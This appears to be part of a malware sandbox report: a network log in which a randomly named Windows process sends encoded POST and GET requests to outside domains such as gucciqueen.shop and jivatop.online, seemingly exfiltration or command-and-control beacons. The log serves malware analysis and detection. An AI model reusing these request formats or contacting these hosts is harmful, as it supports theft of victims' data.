                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.65000667.223.117.142804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:15.492445946 CET485OUTGET /yhso/?IrPLc=Knb4R&08rl=qshK0E1CF4G1Sir9YwhfIyIJsH40nusxx8ay40x9lBPpumonqOgOHkS7CUCTyeg3KaY3G5xJAfwXsCu9cW8WruEAiYD2w0a2Z1Gg4cekeTUI2P7TVw+M8wQ7uq12F63bSznXgbg= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.plyvik.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:23:16.177556038 CET548INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:16 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.650007178.79.184.196804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:21.284688950 CET756OUTPOST /0g3j/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.gucciqueen.shop
                                                                      Origin: http://www.gucciqueen.shop
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.gucciqueen.shop/0g3j/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 41 57 76 79 74 4e 6c 67 34 4a 45 50 65 63 76 78 41 59 32 70 30 34 37 45 37 74 44 62 59 41 6d 72 44 4b 7a 65 71 59 73 64 66 35 53 49 35 44 77 6d 2b 69 68 5a 61 44 78 53 38 4e 45 41 43 48 6e 6e 50 41 76 35 75 32 4a 62 35 30 31 41 30 59 50 73 6d 33 4b 59 46 58 52 57 6c 79 64 70 72 4c 43 57 57 6f 59 57 78 37 53 57 69 6c 31 34 72 77 51 62 2b 65 34 36 37 73 32 78 37 63 7a 2b 44 6a 59 78 36 65 37 66 37 31 61 69 34 74 64 42 71 66 71 66 6e 49 4b 52 79 63 79 53 32 35 6b 70 5a 7a 72 7a 51 70 4c 4b 59 70 4f 65 54 65 57 58 47 34 6f 6f 4c 76 69 6f 6a 79 69 62 62 5a 61 38 78 69 77 74 30 64 4a 4d 75 31 38 4c 33 47 52 4e
                                                                      Data Ascii: 08rl=AWvytNlg4JEPecvxAY2p047E7tDbYAmrDKzeqYsdf5SI5Dwm+ihZaDxS8NEACHnnPAv5u2Jb501A0YPsm3KYFXRWlydprLCWWoYWx7SWil14rwQb+e467s2x7cz+DjYx6e7f71ai4tdBqfqfnIKRycyS25kpZzrzQpLKYpOeTeWXG4ooLviojyibbZa8xiwt0dJMu18L3GRN
                                                                      Nov 6, 2024 05:23:22.071804047 CET461INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:21 GMT
                                                                      Server: Apache/2.4.62 (Debian)
                                                                      Content-Length: 281
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.650008178.79.184.196804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:23.825119019 CET780OUTPOST /0g3j/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.gucciqueen.shop
                                                                      Origin: http://www.gucciqueen.shop
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.gucciqueen.shop/0g3j/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 41 57 76 79 74 4e 6c 67 34 4a 45 50 52 64 2f 78 48 4a 32 70 79 59 37 46 2b 74 44 62 4b 41 6e 69 44 4b 2f 65 71 63 39 47 66 4b 6d 49 34 68 6f 6d 2f 67 4a 5a 64 44 78 53 33 74 45 2f 61 6e 6e 38 50 41 79 47 75 32 46 62 35 30 78 41 30 64 7a 73 6d 41 2b 58 44 48 52 55 77 43 64 76 32 62 43 57 57 6f 59 57 78 37 75 38 69 6c 74 34 72 6a 49 62 38 37 55 39 7a 4d 32 77 38 63 7a 2b 48 6a 59 31 36 65 37 48 37 30 58 35 34 6f 42 42 71 61 4f 66 6e 5a 4b 53 70 4d 7a 58 72 4a 6b 32 4b 32 43 4e 5a 70 69 57 61 62 4f 36 48 65 65 58 4b 75 31 79 58 63 69 4c 78 69 43 5a 62 62 43 4f 78 43 77 48 32 64 78 4d 38 69 77 73 34 79 30 75 49 4f 75 49 71 66 4a 53 45 54 5a 47 4a 46 41 45 51 58 6f 72 70 77 3d 3d
                                                                      Data Ascii: 08rl=AWvytNlg4JEPRd/xHJ2pyY7F+tDbKAniDK/eqc9GfKmI4hom/gJZdDxS3tE/ann8PAyGu2Fb50xA0dzsmA+XDHRUwCdv2bCWWoYWx7u8ilt4rjIb87U9zM2w8cz+HjY16e7H70X54oBBqaOfnZKSpMzXrJk2K2CNZpiWabO6HeeXKu1yXciLxiCZbbCOxCwH2dxM8iws4y0uIOuIqfJSETZGJFAEQXorpw==
                                                                      Nov 6, 2024 05:23:24.620362043 CET461INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:24 GMT
                                                                      Server: Apache/2.4.62 (Debian)
                                                                      Content-Length: 281
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.650009178.79.184.196804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:26.372837067 CET1793OUTPOST /0g3j/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.gucciqueen.shop
                                                                      Origin: http://www.gucciqueen.shop
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.gucciqueen.shop/0g3j/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 41 57 76 79 74 4e 6c 67 34 4a 45 50 52 64 2f 78 48 4a 32 70 79 59 37 46 2b 74 44 62 4b 41 6e 69 44 4b 2f 65 71 63 39 47 66 4b 2b 49 34 53 67 6d 2b 48 56 5a 63 44 78 53 30 74 45 45 61 6e 6d 6b 50 41 36 43 75 32 5a 6c 35 32 5a 41 30 2f 4c 73 33 43 57 58 4b 48 52 55 79 43 64 71 72 4c 43 44 57 6f 6f 4b 78 39 4f 38 69 6c 74 34 72 6c 4d 62 71 2b 34 39 31 4d 32 78 37 63 79 78 44 6a 59 64 36 65 7a 35 37 30 43 4d 34 38 4e 42 74 36 65 66 68 72 79 53 30 63 7a 5a 6f 4a 6c 6a 4b 32 47 6f 5a 76 47 61 61 61 71 41 48 5a 75 58 49 5a 6b 72 43 50 61 75 73 42 2b 66 48 4c 72 70 33 55 67 43 70 75 78 61 78 77 34 32 78 47 41 66 51 70 57 42 2b 65 73 79 53 69 6c 7a 46 79 4a 6c 51 47 31 75 31 51 35 37 48 75 4a 64 50 5a 36 2f 31 62 4f 4d 65 5a 67 64 35 4c 52 42 69 35 36 2b 46 4b 2f 63 66 35 35 36 4a 2b 41 36 4e 4f 2b 48 30 69 5a 53 38 57 68 4d 47 64 4f 6d 47 76 46 74 61 64 47 50 6e 57 41 56 65 68 6b 72 41 79 63 69 57 30 50 47 6e 31 73 78 70 31 76 2b 46 66 75 61 31 57 69 6f 73 49 4f 35 44 38 42 57 63 6a 6e 57 4a [TRUNCATED]
                                                                      Data Ascii: 08rl=AWvytNlg4JEPRd/xHJ2pyY7F+tDbKAniDK/eqc9GfK+I4Sgm+HVZcDxS0tEEanmkPA6Cu2Zl52ZA0/Ls3CWXKHRUyCdqrLCDWooKx9O8ilt4rlMbq+491M2x7cyxDjYd6ez570CM48NBt6efhryS0czZoJljK2GoZvGaaaqAHZuXIZkrCPausB+fHLrp3UgCpuxaxw42xGAfQpWB+esySilzFyJlQG1u1Q57HuJdPZ6/1bOMeZgd5LRBi56+FK/cf556J+A6NO+H0iZS8WhMGdOmGvFtadGPnWAVehkrAyciW0PGn1sxp1v+Ffua1WiosIO5D8BWcjnWJeDqgF5yGCaDKFlF1Tee7yO1B1qCOC7I1gVs+yo0ZpNKE3NFnfwlX0wDrGotneQontk3XfqdW/oh6MlWyO4Gk4GeB7F/DBgKTjMRBqGuSjqwhSZEmLsGCi0GRb8IH1MmDSuc4t6mXEp3fX/ZzzviAHxRK8UgJou0JrUwuImBmIm5hhBXrK79FzdkOLPAEPIZh/D1CDYsExqVL/1xfh8JJkYknHCI7ypBE7GdOb+yXM3TXVvssx7bgil1YHT1yJ0ru3UxEbHtlJQlSx/cPm/gyNUqMvDu0l1W3MuPdQtYxtRetk8lr6SKpUPvP6Lmv5Ci0ShKXht/AFoJ+VAVo/faInzY6T+RE5Ko2d6ClgDGqHNlaZ8DIm0Yc2QZl8dw3HeVXNyA8yOtAt/J1l1KbXcbnl9yxFjnRsVellk5urKR0ffqaWhaGLWtNOp1p22Yizhy3QaHUDPNnJKl+1JstJGCmwnLUxLZKVfLwhes17oImi4zxoyLXfO2/ibkIhP/qe5aSPLTicyItap48thN1Qvpuz99rtZuQZvpcgQhhol+7BT+oPuDfnOOiABHq32S5SLsyEZ2LxIkeP+R14a6LZSFXX2mk/n2WavtNMW2B2g9xdolz1RNidD/oL4qqF/dGNUALLaXd6uQeKk87Yq567dHsFp2JlI+2LZub7B [TRUNCATED]
                                                                      Nov 6, 2024 05:23:27.174319029 CET461INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:27 GMT
                                                                      Server: Apache/2.4.62 (Debian)
                                                                      Content-Length: 281
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.650010178.79.184.196804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:28.916708946 CET489OUTGET /0g3j/?08rl=NUHSu4JJ/Kg1VJPQXLy5z6m/27O+diehBYTKyfkdb4Gb1jUS0BQgTHwq/v5TPkjaPgaSjERVsEgj0/u2pw6ETGFSwQcSpI7WWZojw8+UmAVwwTMD/Kk0887QkMTIKRMf3/bI2Cw=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.gucciqueen.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:23:29.716624975 CET461INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:29 GMT
                                                                      Server: Apache/2.4.62 (Debian)
                                                                      Content-Length: 281
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.650011185.179.189.193804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:43.056734085 CET753OUTPOST /gls1/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.jivatop.online
                                                                      Origin: http://www.jivatop.online
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jivatop.online/gls1/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 5a 67 32 4e 68 58 42 6b 57 79 44 72 46 66 61 4c 67 66 48 77 57 77 78 2b 78 6a 6c 78 49 42 72 78 79 39 4f 37 54 79 4a 50 36 72 37 76 36 44 39 64 34 65 45 72 61 58 67 49 6c 77 32 6f 33 7a 2b 41 58 70 31 56 70 46 4e 37 54 65 6d 71 33 66 55 7a 56 6c 2f 4c 74 79 32 63 74 74 6d 55 39 6f 4d 6b 55 41 6d 64 6a 4b 45 34 56 30 39 63 32 4d 6a 4f 65 46 47 47 56 58 6a 4b 44 42 66 6d 54 47 42 6d 31 4d 74 53 6e 63 68 6a 4b 4b 5a 61 44 6d 67 35 47 77 77 34 38 33 63 63 4b 31 2f 6f 59 30 62 39 63 73 64 49 50 57 57 70 50 41 76 45 72 5a 47 44 72 64 7a 4f 57 49 79 54 48 32 65 6a 4f 7a 70 43 4e 4d 61 50 4b 71 35 6f 39 64 67 32
                                                                      Data Ascii: 08rl=Zg2NhXBkWyDrFfaLgfHwWwx+xjlxIBrxy9O7TyJP6r7v6D9d4eEraXgIlw2o3z+AXp1VpFN7Temq3fUzVl/Lty2cttmU9oMkUAmdjKE4V09c2MjOeFGGVXjKDBfmTGBm1MtSnchjKKZaDmg5Gww483ccK1/oY0b9csdIPWWpPAvErZGDrdzOWIyTH2ejOzpCNMaPKq5o9dg2
                                                                      Nov 6, 2024 05:23:44.092056036 CET1236INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 06 Nov 2024 04:23:43 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Content-Encoding: gzip
                                                                      Expires: Wed, 06 Nov 2024 04:23:43 GMT
                                                                      Set-Cookie: _subid=28p5d372dq9ob; expires=Sat, 07 Dec 2024 04:23:43 GMT; path=/
                                                                      Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwODY3MDIzfSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwODY3MDIzfSxcInRpbWVcIjoxNzMwODY3MDIzfSJ9.FrGC0G6bxefJk4o9PKqwYxpnBX3mlpDNmY6JFk4dUPU; expires=Wed, 13 Sep 2079 08:47:26 GMT; path=/
                                                                      Vary: Accept-Encoding
                                                                      X-Powered-By: PHP/7.4.33
                                                                      Access-Control-Allow-Origin: *
                                                                      Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d 5f 6f 1c c9 75 ef fb 7e 8a 36 1f 2e ee c5 d5 11 45 6a 57 d2 d2 a4 fc e0 eb 8b e4 25 09 92 35 8c 3c 11 35 dd c5 e9 5a 75 57 75 aa aa 5b ea 11 16 20 39 ab 95 36 d2 8a f1 da b0 03 7b 9d 5d 23 41 1c c0 b0 3d a4 38 d2 68 86 1c 02 fa 04 55 5f c1 9f 24 a8 53 3d 24 25 51 23 69 c3 c5 f4 58 ad 07 71 a6 d9 7f 6a 38 a7 ce ef fc fd 9d f7 56 bf f7 ff fe f6 87 1f fd e3 df fd 28 88 75 9a 5c 7f 6f d5 fd 08 12 c2 db 6b 0b 94 2f 5c 7f 2f 08 82 60 35 a6 24 ba be da 22 8a 06 b1 a4 1b 6b 0b 8b 09 e1 11 95 8b 5c 14 42 69 06 8a b6 45 c4 4b 02 00 85 a2 50 1d 5e 64 3c a2 b7 2e 66 71 56 dd 08 6f 96 52 4d 82 58 eb 0c e8 3f e5 ac 58 5b f8 a1 e0 9a 72 0d 1f 95 19 5d 08 42 ff 6e 6d 41 d3 5b 7a d1 2d e7 fb 41 18 13 a9 a8 5e fb f1 47 ff 1f ae 2d 04 8b a7 ee a6 99 4e e8 75 f3 1b 33 36 7b 66 6c b7 ec b6 19 04 76 cb f4 cd 23 33 36 fb e6 d0 ee 04 2b 81 f9 d2 1d 0a cc e1 e9 d3 56 17 fd c5 2f 2c 8d 93 94 ae 2d 14 8c de cc 84 d4 a7 16 74 93 45 3a 5e 8b 68 c1 42 0a f8 e6 42 c0 38 d3 8c 24 [TRUNCATED]
                                                                      Data Ascii: d96}_ou~6.EjW%5<5ZuWu[ 96{]#A=8hU_$S=$%Q#iXqj8V(u\ok/\/`5$"k\BiEKP^d<.fqVoRMX?X[r]BnmA[z-A^G-Nu36{flv#36+V/,-tE:^hBB8$B0~#4Y[PL)_0TjqCp.JeoF$QSr-Vr)lGaX^ ;tb!PC['7XpyWwTd>V)aW)6~
